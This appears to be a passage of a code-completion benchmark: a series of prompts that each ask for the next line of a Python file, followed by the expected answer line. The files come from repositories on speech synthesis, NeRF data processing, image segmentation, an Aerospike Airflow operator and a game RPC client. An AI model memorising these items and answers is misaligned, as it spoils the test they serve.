import json import os import traceback import speech_recognition as sr import uvicorn import extensions.openai.completions as OAIcompletions import extensions.openai.embeddings as OAIembeddings import extensions.openai.images as OAIimages import extensions.openai.logits as OAIlogits import 
extensions.openai.models as OAImodels import extensions.openai.moderations as OAImoderations from threading import Thread from fastapi import Depends, FastAPI, Header, HTTPException from fastapi.middleware.cors import CORSMiddleware from fastapi.requests import Request from fastapi.responses import JSONResponse from pydub import AudioSegment from sse_starlette import EventSourceResponse from extensions.openai.errors import ServiceUnavailableError from extensions.openai.tokens import token_count, token_decode, token_encode from extensions.openai.utils import _start_cloudflared from modules import shared from modules.logging_colors import logger from modules.models import unload_model from modules.text_generation import stop_everything_event from .typing import ( ChatCompletionRequest, ChatCompletionResponse, CompletionRequest, CompletionResponse, DecodeRequest, DecodeResponse, EmbeddingsRequest, EmbeddingsResponse, EncodeRequest, EncodeResponse, LoadLorasRequest, LoadModelRequest, LogitsRequest, LogitsResponse, LoraListResponse, ModelInfoResponse, ModelListResponse, TokenCountResponse, to_dict ) params = { 'embedding_device': 'cpu', 'embedding_model': 'sentence-transformers/all-mpnet-base-v2', 'sd_webui_url': '', 'debug': 0 } streaming_semaphore = asyncio.Semaphore(1) def verify_api_key(authorization: str = Header(None)) -> None: expected_api_key = shared.args.api_key if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"): raise HTTPException(status_code=401, detail="Unauthorized") def verify_admin_key(authorization: str = Header(None)) -> None: expected_api_key = shared.args.admin_key if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"): raise HTTPException(status_code=401, detail="Unauthorized") app = FastAPI() check_key = [Depends(verify_api_key)] check_admin_key = [Depends(verify_admin_key)] # Configure CORS settings to allow all origins, methods, and headers app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"] ) @app.options("/", dependencies=check_key) async def options_route(): return JSONResponse(content="OK") @app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key) async def openai_completions(request: Request, request_data: CompletionRequest): path = request.url.path is_legacy = "/generate" in path if request_data.stream: async def generator(): async with streaming_semaphore: response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy) for resp in response: disconnected = await request.is_disconnected() if disconnected: break yield {"data": json.dumps(resp)} return EventSourceResponse(generator()) # SSE streaming else: response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy) return JSONResponse(response)
@app.post('/v1/chat/completions', response_model=ChatCompletionResponse, dependencies=check_key)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: foocker/Bert-VITS2-Faster # Path: infer_.py def get_net_g(model_path: str, version: str, device: str, hps): def get_text(text, language_str, hps, device): def infer( text, sdp_ratio, noise_scale, noise_scale_w, length_scale, language, sid, hps, net_g, device, skip_start=False, skip_end=False, g_model_name=None ): # Path: config.py class Resample_config: class Preprocess_text_config: class Bert_gen_config: class Emo_gen_config: class Train_ms_config: class Webui_config: class Server_config: class Translate_config: class Config: def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, transcription_path: str, cleaned_path: str, train_path: str, val_path: str, config_path: str, val_per_spk: int = 5, max_val_total: int = 10000, clean: bool = True, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, env: Dict[str, any], base: Dict[str, any], model: str, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, device: str, model: str, config_path: str, language_identification_library: str, port: int = 7860, share: bool = False, debug: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, models: List[Dict[str, any]], port: int = 5000, device: str = "cuda" ): def from_dict(cls, data: Dict[str, any]): def __init__(self, app_key: str, secret_key: str): def from_dict(cls, data: Dict[str, any]): def __init__(self, config_path: str): # Path: infer_torch_export_onnx.py import os import logging import re_matching import torch import utils import gradio as gr import numpy as np import time from infer_ import infer, latest_version, get_net_g from config import config from scipy.io.wavfile import write logging.basicConfig( level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s" ) logger = logging.getLogger(__name__) net_g = None device = config.webui_config.device if device == "mps": os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" def generate_audio( slices, sdp_ratio, noise_scale, noise_scale_w, length_scale, speaker, language, skip_start=False, skip_end=False, ): audio_list = [] # silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16) with torch.no_grad(): for idx, piece in enumerate(slices): skip_start = (idx != 0) and skip_start skip_end = (idx != len(slices) - 1) and skip_end
audio = infer(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: sinoyou/nelf-pro # Path: nerfstudio/utils/rich_utils.py def status(msg: str, spinner: str = "bouncingBall", verbose: bool = False): """A context manager that does nothing is verbose is True. Otherwise it hides logs under a message. Args: msg: The message to log. spinner: The spinner to use. verbose: If True, print all logs, else hide them. """ if verbose: return nullcontext() return CONSOLE.status(msg, spinner=spinner) # Path: nerfstudio/utils/scripts.py def run_command(cmd: str, verbose=False) -> Optional[str]: """Runs a command and returns the output. Args: cmd: Command to run. verbose: If True, logs the output of the command. Returns: The output of the command if return_output is True, otherwise None. """ out = subprocess.run(cmd, capture_output=not verbose, shell=True, check=False) if out.returncode != 0: CONSOLE.rule("[bold red] :skull: :skull: :skull: ERROR :skull: :skull: :skull: ", style="red") CONSOLE.print(f"[bold red]Error running command: {cmd}") CONSOLE.rule(style="red") CONSOLE.print(out.stderr.decode("utf-8")) sys.exit(1) if out.stdout is not None: return out.stdout.decode("utf-8") return out # Path: nerfstudio/process_data/process_data_utils.py import shutil import sys from enum import Enum from pathlib import Path from typing import List, Optional, Tuple from rich.console import Console from typing_extensions import Literal from nerfstudio.utils.rich_utils import status from nerfstudio.utils.scripts import run_command # Copyright 2022 The Nerfstudio Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Helper utils for processing data into the nerfstudio format.""" CONSOLE = Console(width=120) class CameraModel(Enum): """Enum for camera types.""" OPENCV = "OPENCV" OPENCV_FISHEYE = "OPENCV_FISHEYE" CAMERA_MODELS = { "perspective": CameraModel.OPENCV, "fisheye": CameraModel.OPENCV_FISHEYE, } def get_num_frames_in_video(video: Path) -> int: """Returns the number of frames in a video. Args: video: Path to a video. Returns: The number of frames in a video. """ cmd = f"ffprobe -v error -select_streams v:0 -count_packets \ -show_entries stream=nb_read_packets -of csv=p=0 {video}" output = run_command(cmd) assert output is not None output = output.strip(" ,\t\n\r") return int(output) def convert_video_to_images( video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False ) -> Tuple[List[str], int]: """Converts a video into a sequence of images. Args: video_path: Path to the video. output_dir: Path to the output directory. num_frames_target: Number of frames to extract. verbose: If True, logs the output of the command. Returns: A tuple containing summary of the conversion and the number of extracted frames. """
with status(msg="Converting video to images...", spinner="bouncingBall", verbose=verbose):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: wuc9521/rep-flow # Path: utils/loader.py def read_keywords_from_file(file_path, app: Flask = None): try: with open(file_path, 'r') as file: content = file.read() keywords_list = [keyword.strip() for keyword in re.split(',|\n', content) if keyword.strip()] app.logger.info(f"Keywords loaded: {keywords_list}") return keywords_list except FileNotFoundError: app.logger.info(f"Error: File '{file_path}' not found.") return [] # Path: utils/hints.py HELP = get_HELP_HINT() # Path: utils/hints.py def get_NUMBER_EMBD_HINT(id): return f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launching...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launched...</span></li> </ul> """ # Path: utils/hints.py def get_CURRENT_STATE_HINT(id): return \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> </ul> """ if int(id) >= 0 else \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>No test launched</span></li> </ul> """ # Path: utils/hints.py def get_NEXT_STEP_HINT(id): return \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> </ul> """ # Path: utils/test.py def extract_and_validate_test_number(query_text, app): """ refer to: https://regex101.com/r/x609CD/1 """ match = re.match(r'\/?test (\d+)$', query_text) app.logger.info(f"query_text: {query_text}") if match: test_number = match.group(1) if test_number.isdigit(): return test_number return None # Path: utils/log.py def log_(logger, level, message): cf = inspect.currentframe() caller_frame = cf.f_back caller_info = inspect.getframeinfo(caller_frame) log_message = f"{caller_info.filename}:{caller_info.lineno} - {message}" if level == 'info': logger.info(log_message) elif level == 'error': logger.error(log_message) elif level == 'warning': logger.warning(log_message) elif level == 'debug': logger.debug(log_message) else: raise ValueError(f"Unsupported log level: {level}") # Path: utils/file.py def get_i(id, i): LIST_DIR = os.path.join(os.path.dirname(__file__), '../data/list') i = int(i) try: with open(os.path.join(LIST_DIR, str(id)+'.json'),'r') as f: data = json.load(f) if 0 <= i < len(data): return data[i]['guidance']+'.png', i==len(data)-1 else: return f"Index {i} is out of range." 
except Exception as e: return str(e) # Path: model/common.py TEST_DIR = [] DATA_DIR = os.path.join(os.path.dirname(__file__), '../data') LIST_DIR = os.path.join(DATA_DIR, 'list') # Path: model/process.py def image_process(image_user_path, image_list, app=None): """ img_user_path: absolute path of user image img_list: list of guidance img """ print(TEST_DIR) image_user = io.imread(image_user_path) max_score = 0 max_similar = 0 for i in range(len(image_list)): if app: app.logger.info(f"Calculating Similarity: image {i}") score = classify_hist_with_split(image_user, image_list[i]) if score > max_score: max_score = score max_similar = i if max_score < 0.7: return None return max_similar, max_score # Path: app.py import os import spacy import logging import pandas as pd from logging.handlers import RotatingFileHandler from flask import Flask, render_template, request, jsonify, send_from_directory from flask_cors import cross_origin from utils.loader import read_keywords_from_file from utils.hints import HELP, get_NUMBER_EMBD_HINT, get_CURRENT_STATE_HINT, get_NEXT_STEP_HINT from utils.test import extract_and_validate_test_number from utils.log import log_ from utils.file import get_i from model.common import imgs from model.process import image_process DEFAULT_RESPONSE_FLAG = "*" NUMBER_EMBD_HINT = None CURRENT_BUG_ID = -1 # Load spaCy English model nlp = spacy.load("en_core_web_sm") app = Flask(__name__, template_folder='') # Configure LOG_DIR = os.path.join(app.root_path, 'log') DATA_DIR = os.path.join(app.root_path, 'data') MODEL_DIR = os.path.join(app.root_path, 'model') CORPUS_DIR = os.path.join(DATA_DIR, 'corpus') GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance') STATE_DIR = os.path.join(DATA_DIR, 'state') std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv')) df = pd.merge( pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')), std, on='ID', how='left' ) qa = dict(zip(df['Q'], df['A'])) at = dict(zip(std['A'], std['TYPE'])) ta = dict(zip(std['TYPE'], std['A']))
key_words = read_keywords_from_file(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yash-srivastava19/verizon # Path: other_utils.py def kvlm_serialize(kvlm): ret = b'' for k in kvlm.keys(): if k == None: continue val = kvlm[k] if type(val) != list: val = [val] for v in val: ret += k + b' ' + (v.replace(b'\n ')) + b'\n' ret += b'\n' + kvlm[None] + b'\n' return ret # Path: other_utils.py def kvlm_parse(raw, start=0, dct=None): if not dct: dct = collections.OrderedDict() # We search for next space and the next line. If space appears before a newline, we have a keyword. Othewise, it's the final message, which we just read to the end of file. spc = raw.find(b' ', start) nl = raw.find(b'\n', start) # Base Case : if (spc<0) or (nl<spc): assert nl==start dct[None] = raw[start+1 :] return dct # Recursive Case : key = raw[start:spc] end = start # Find the end of the value. We loop until we find a '\n' followed by a space. while True: end = raw.find(b'\n', end+1) if raw[end+1] != ord(' '): break value = raw[spc+1: end].replace(b'\n ', b'\n') if key in dct: if type(dct[key]) == list: dct[key].append(value) else: dct[key] = [dct[key], value] else: dct[key] = value return kvlm_parse(raw, start=end+1, dct=dct) # Path: classes.py from class_utils import * from other_utils import kvlm_serialize, kvlm_parse class VerizonRepository: worktree = None vrzdir = None conf = None def __init__(self, path, force = False): self.worktree = path self.vrzdir = os.path.join(path, ".vrz") if not (force or os.path.isdir(self.vrzdir)): raise Exception(f"Not a Verizon Repository : {path}") # Read Config file. self.conf = configparser.ConfigParser() cf = repo_file(self, "config") if cf and os.path.exists(cf): self.conf.read([cf]) elif not force: raise Exception("Configuration File is Missing") if not force: vers = int(self.conf.get("core", "repositoryformatversion")) if vers != 0: raise Exception(f"Unsupported repositoryformatversion : {vers}") class VerizonObject: def __init__(self, data=None) -> None: if data != None: self.deserialize(data) else: self.init() def serialize(self, repo): """ Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """ raise NotImplementedError def deserialize(self, data): raise NotImplementedError def init(self): pass # Tree wrapper for a single record(a single path). class VerizonTreeLeaf: def __init__(self, mode, path, sha) -> None: self.mode = mode self.path = path self.sha = sha ## Type Header could be one of `blob`, `commit`, `tag`, `tree`. # Blobs are user data. The content of every file we put in git is stored as a blob. class VerizonBlob(VerizonObject): fmt = b'blob' def serialize(self): return self.blobdata def deserialize(self, data): self.blobdata = data class VerizonCommit(VerizonObject): fmt = b'commit' def deserialize(self, data): self.kvlm = kvlm_parse(data) def serialize(self, repo):
return kvlm_serialize(self.kvlm)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: amazon-science/c2f-seg # Path: data/dataloader_transformer.py def load_dataset(config, args, mode): if mode=="train": if args.dataset=="KINS": train_dataset = Kins_Fusion_dataset(config, mode='train') test_dataset = Kins_Fusion_dataset(config, mode='test') elif args.dataset=="COCOA": train_dataset = COCOA_Fusion_dataset(config, mode='train') test_dataset = COCOA_Fusion_dataset(config, mode='test') elif args.dataset=="Fishbowl": train_dataset = FishBowl(config, mode='train') test_dataset = FishBowl(config, mode='test') elif args.dataset=="MOViD_A": train_dataset = MOViD_A(config, mode='train') test_dataset = MOViD_A(config, mode='test') return train_dataset, test_dataset else: if args.dataset=="KINS": test_dataset = KINS_Aisformer_VRSP_Intersection(config, mode='test') elif args.dataset=="COCOA": test_dataset = COCOA_Fusion_dataset(config, mode='test') elif args.dataset=="Fishbowl": test_dataset = FishBowl(config, mode='test') elif args.dataset=="MOViD_A": test_dataset = MOViD_A(config, mode='test') return test_dataset # Path: utils/logger.py def setup_logger(work_dir=None, logfile_name='log.txt', logger_name='log'): """Sets up logger from target work directory. The function will sets up a logger with `DEBUG` log level. Two handlers will be added to the logger automatically. One is the `sys.stdout` stream, with `INFO` log level, which will print improtant messages on the screen. The other is used to save all messages to file `$WORK_DIR/$LOGFILE_NAME`. Messages will be added time stamp and log level before logged. NOTE: If `work_dir` or `logfile_name` is empty, the file stream will be skipped. Args: work_dir: The work directory. All intermediate files will be saved here. (default: None) logfile_name: Name of the file to save log message. (default: `log.txt`) logger_name: Unique name for the logger. (default: `logger`) Returns: A `logging.Logger` object. Raises: SystemExit: If the work directory has already existed, of the logger with specified name `logger_name` has already existed. """ logger = logging.getLogger(logger_name) formatter = logging.Formatter("[%(asctime)s][%(levelname)s] %(message)s") if not logger.handlers: logger.setLevel(logging.DEBUG) # Print log message with `INFO` level or above onto the screen. sh = logging.StreamHandler(stream=sys.stdout) # sh.setLevel(logging.INFO) sh.setLevel(logging.INFO) sh.setFormatter(formatter) logger.addHandler(sh) logger.propagate = False if not work_dir or not logfile_name: return logger if os.path.exists(work_dir): print(f'Work directory `{work_dir}` has already existed!') os.makedirs(work_dir, exist_ok=True) # Save log message with all levels in log file. 
fh = logging.FileHandler(os.path.join(work_dir, logfile_name)) fh.setLevel(logging.DEBUG) fh.setFormatter(formatter) logger.addHandler(fh) return logger # Path: utils/utils.py class Config(object): def __init__(self, config_path): with open(config_path, 'r') as f: self._yaml = f.read() self._dict = yaml.load(self._yaml, Loader=yaml.SafeLoader) self._dict['path'] = os.path.dirname(config_path) def __getattr__(self, name): if self._dict.get(name) is not None: return self._dict[name] return None def print(self): print('Model configurations:') print('---------------------------------') print(self._yaml) print('') print('---------------------------------') print('') # Path: utils/utils.py def to_cuda(meta, device): for k in meta: if meta[k] is not None: meta[k] = meta[k].to(device) return meta # Path: test_c2f_seg.py import os import cv2 import time import random import argparse import numpy as np import torch import torch.distributed as dist from tqdm import tqdm from shutil import copyfile from torch.utils.data import DataLoader from data.dataloader_transformer import load_dataset from utils.logger import setup_logger from utils.utils import Config, to_cuda from src.image_model import C2F_Seg from src.video_model import C2F_Seg if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--seed', type=int, default=42) # path parser.add_argument('--path', type=str, required=True, help='model checkpoints path') parser.add_argument('--check_point_path', type=str, default="../check_points", ) parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan') # dataset parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset") parser.add_argument('--data_type', type=str, default="image", help = "select image or video model") parser.add_argument('--batch', type=int, default=1) parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training") args = parser.parse_args() if args.data_type=="image": elif args.data_type=="video": dist.init_process_group(backend="nccl") torch.cuda.set_device(args.local_rank) rank = dist.get_rank() args.path = os.path.join(args.check_point_path, args.path) vq_model_path = os.path.join(args.check_point_path, args.vq_path) os.makedirs(args.path, exist_ok=True) config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset)) # copy config template if does't exist if not os.path.exists(config_path): copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path) # load config file config = Config(config_path) config.path = args.path config.batch_size = args.batch config.dataset = args.dataset log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logger = setup_logger(os.path.join(args.path, 'logs'), logfile_name=log_file)
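For reference, the handler wiring that setup_logger in this example performs can be reduced to the following self-contained sketch; the function and argument names here are illustrative, not from the repo:

import logging
import os
import sys

def make_logger(work_dir, logfile_name="log.txt", name="demo"):
    # One logger, two handlers: INFO and above to stdout, everything to a file.
    logger = logging.getLogger(name)
    if logger.handlers:  # already configured; avoid stacking duplicate handlers
        return logger
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter("[%(asctime)s][%(levelname)s] %(message)s")
    stream_handler = logging.StreamHandler(stream=sys.stdout)
    stream_handler.setLevel(logging.INFO)
    stream_handler.setFormatter(formatter)
    logger.addHandler(stream_handler)
    os.makedirs(work_dir, exist_ok=True)
    file_handler = logging.FileHandler(os.path.join(work_dir, logfile_name))
    file_handler.setLevel(logging.DEBUG)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    return logger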
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Hammour-steak/GOUB # Path: codes/models/modules/module_util.py class SinusoidalPosEmb(nn.Module): def __init__(self, dim): super().__init__() self.dim = dim def forward(self, x): device = x.device half_dim = self.dim // 2 emb = math.log(10000) / (half_dim - 1) emb = torch.exp(torch.arange(half_dim, device=device) * -emb) emb = x[:, None] * emb[None, :] emb = torch.cat((emb.sin(), emb.cos()), dim=-1) return emb # Path: codes/models/modules/module_util.py class LayerNorm(nn.Module): def __init__(self, dim): super().__init__() self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) def forward(self, x): eps = 1e-5 if x.dtype == torch.float32 else 1e-3 var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) * (var + eps).rsqrt() * self.g # Path: codes/models/modules/module_util.py def exists(x): return x is not None # Path: codes/models/modules/DenoisingNAFNet_arch.py import torch import torch.nn as nn import torch.nn.functional as F from einops import rearrange, reduce from .module_util import SinusoidalPosEmb, LayerNorm, exists class SimpleGate(nn.Module): def forward(self, x): x1, x2 = x.chunk(2, dim=1) return x1 * x2 class NAFBlock(nn.Module): def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.): super().__init__() self.mlp = nn.Sequential( SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4) ) if time_emb_dim else None dw_channel = c * DW_Expand self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True) self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel, bias=True) self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True) # Simplified Channel Attention self.sca = nn.Sequential( nn.AdaptiveAvgPool2d(1), nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1, groups=1, bias=True), ) # SimpleGate self.sg = SimpleGate() ffn_channel = FFN_Expand * c self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True) self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.norm1 = LayerNorm(c)
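The ref line attaches a LayerNorm to the NAFBlock above; the block's defining trick is SimpleGate, which trades channel width for a multiplicative nonlinearity. A minimal demonstration of that shape arithmetic (tensor sizes chosen arbitrarily):

import torch

x = torch.randn(2, 8, 4, 4)    # (batch, channels, height, width)
x1, x2 = x.chunk(2, dim=1)     # split the channel axis into two halves
gated = x1 * x2                # SimpleGate: elementwise product, channels halved
assert gated.shape == (2, 4, 4, 4)

This is why conv1/conv2 expand to DW_Expand * c channels and conv4 to FFN_Expand * c: the gate consumes half of them.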
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: eldar-eln-bigabid/airflow-aerospike-provider # Path: aerospike_provider/operators/aerospike.py class AerospikeGetKeyOperator(BaseOperator): """ Read an existing record's metadata and all of its bins for a specified key. :param namespace: namespace to use in aerospike db :param set: set name in the namespace :param key: key to get and return. can be a single key or a list of keys :param policy: which policy the key should be saved with. default `POLICY_KEY_SEND` :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default' """ template_fields: Sequence[str] = ("key",) template_ext: Sequence[str] = () ui_color = "#66c3ff" def __init__( self, namespace: str, set: str, key: Union[List[str], str], policy: dict = {'key': aerospike.POLICY_KEY_SEND}, aerospike_conn_id: str = "aerospike_default", **kwargs: Any, ) -> None: super().__init__(**kwargs) self.key = key self.namespace = namespace self.set = set self.key = key self.policy = policy self.aerospike_conn_id = aerospike_conn_id def execute(self, context: Context) -> list: with AerospikeHook(self.aerospike_conn_id) as hook: self.log.info('Fetching key') records = hook.get_record(key=self.key, namespace=self.namespace, set=self.set, policy=self.policy) parsed_records = self.parse_records(records=records) self.log.info('Got %s records', len(parsed_records)) return parsed_records def parse_records(self, records: Union[List, tuple]) -> list: # Removing the `bytearray` object from records since object of type bytearray is not JSON serializable for Xcom. if isinstance(records, list): data = list(map(self.create_dict_from_record, records)) elif isinstance(records, tuple): data = [self.create_dict_from_record(record=records)] else: raise ValueError(f"Expecting 'list' or 'tuple', got: {type(records)}") return data @staticmethod def create_dict_from_record(record: tuple) -> dict: try: return { "namespace": record[0][0], "set": record[0][1], "key": record[0][2], "metadata": record[1], "bins": record[2] } except IndexError: # Handling an error when there are no 'bins' in the data return { "namespace": record[0][0], "set": record[0][1], "key": record[0][2], "metadata": record[1] } # Path: aerospike_provider/operators/aerospike.py class AerospikePutKeyOperator(BaseOperator): """ Create a new record, add or remove bins. This can also remove a record (if exists) using ``{"bin": aerospike.null()}`` if it's the last bin. :param key: key to save in the db. :param namespace: namespace to use in aerospike db :param set: set name in the namespace :param bins: bin names and data saved along with the key, as key/value pairs. For example: `{"bin": value}` :param metadata: metadata about the key, e.g. ttl. For example: `{"ttl": 0}` :param policy: which policy the key should be saved with. default `POLICY_EXISTS_IGNORE`.
ref: https://developer.aerospike.com/client/usage/atomic/update#policies :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default' """ template_fields: Sequence[str] = ("key", "bins", "metadata", ) template_ext: Sequence[str] = () ui_color = "#66c3ff" def __init__( self, namespace: str, set: str, key: str, bins: dict, metadata: Union[dict, Any] = None, policy: Dict[str, Any] = {'key': aerospike.POLICY_EXISTS_IGNORE}, aerospike_conn_id: str = "aerospike_default", **kwargs: Any, ) -> None: super().__init__(**kwargs) self.key = key self.namespace = namespace self.set = set self.key = key self.bins = bins self.metadata = metadata self.policy = policy self.aerospike_conn_id = aerospike_conn_id def execute(self, context: Context) -> None: with AerospikeHook(self.aerospike_conn_id) as hook: self.log.info('Storing %s as key', self.key) hook.put(key=self.key, bins=self.bins, metadata=self.metadata, namespace=self.namespace, set=self.set, policy=self.policy) self.log.info('Stored key successfully') # Path: tests/operators/test_aerospike.py import unittest import aerospike from unittest.mock import patch, Mock from aerospike_provider.operators.aerospike import AerospikeGetKeyOperator, AerospikePutKeyOperator # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. class TestAerospikeGetKeyOperator(unittest.TestCase): def setUp(self): self.namespace = 'test_namespace' self.set = 'test_set' self.key = 'test_key' self.policy = { aerospike.POLICY_KEY_SEND } self.task_id = 'test_task' self.metadata = {'ttl': 1000, 'gen': 4} self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
self.operator = AerospikeGetKeyOperator(
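The create_dict_from_record helper in this example flattens Aerospike's (key_tuple, metadata, bins) record into a plain dict. A hedged sketch of the same normalization, assuming the usual four-element key tuple of (namespace, set, user_key, digest); the helper name and sample values are illustrative:

def record_to_dict(record):
    # record = (key_tuple, metadata, bins); key_tuple = (namespace, set, user_key, digest)
    (namespace, set_name, user_key, *_), metadata, bins = record
    return {"namespace": namespace, "set": set_name, "key": user_key,
            "metadata": metadata, "bins": bins}

rec = (("test_ns", "users", "u1", b"\x00"), {"ttl": 100, "gen": 3}, {"name": "Ada"})
assert record_to_dict(rec)["bins"] == {"name": "Ada"}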
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Its-Haze/league-rpc-linux # Path: league_rpc_linux/polling.py def wait_until_exists( url: str, custom_message: str = "", expected_response_code: int = 200, timeout: int = 30, n_sleep: float | int = 5, # Not needed, but good to have. n_total_amount: int = 20, startup: int = False, # Set to True on the first time it tries to poll the local api. (onGameStart) ) -> requests.Response | None: """ Polling on the local riot api until success is returned. """ for _ in range(n_total_amount): try: response = requests.get(url, timeout=timeout, verify=False) if response.status_code != expected_response_code: time.sleep(n_sleep) continue break except ( NewConnectionError, ConnectionError, requests.exceptions.ConnectionError, ): # These errors occur either before the api has started.. # Or when the game has ended if startup: # Make sure we continue to poll the api during the start of a game. time.sleep(n_sleep) continue # When game ends, we don't care about polling the api. return None else: print(custom_message) return None return response # Path: league_rpc_linux/username.py def get_summoner_name(with_discriminator: bool = False) -> str: """ Gets the current summoner name. if with_discriminator is True, the function will return a summoners name with #EUW / #EUNE etc Defaults to not include it. """ url = "https://127.0.0.1:2999/liveclientdata/activeplayername" if response := wait_until_exists( url=url, custom_message=""" Summoner name could not be found. Contact @haze.dev on discord, or submit a ticket on Github. """, ): name = str(response.json()) return name if with_discriminator else name.split("#", maxsplit=1)[0] return "" # Path: league_rpc_linux/kda.py import urllib3 from requests import Response from league_rpc_linux.polling import wait_until_exists from league_rpc_linux.username import get_summoner_name urllib3.disable_warnings() def get_kda() -> str: """ Get the current KDA of your game. """ response = get_current_user_stats() if isinstance(response, Response): parsed_data = response.json() kills = str(parsed_data["kills"]) deaths = str(parsed_data["deaths"]) assists = str(parsed_data["assists"]) return f"{kills}/{deaths}/{assists}" return "" def get_level() -> int: """ Get the current Level of your game. """ response = get_current_active_player_stats() if 